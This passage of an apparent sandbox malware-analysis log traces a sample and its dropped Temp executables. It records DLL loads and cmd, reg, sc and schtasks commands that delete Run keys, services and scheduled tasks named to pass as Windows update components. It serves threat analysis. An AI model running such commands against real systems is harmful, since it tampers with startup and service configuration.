    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\sysludpvs.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: sppc.dll
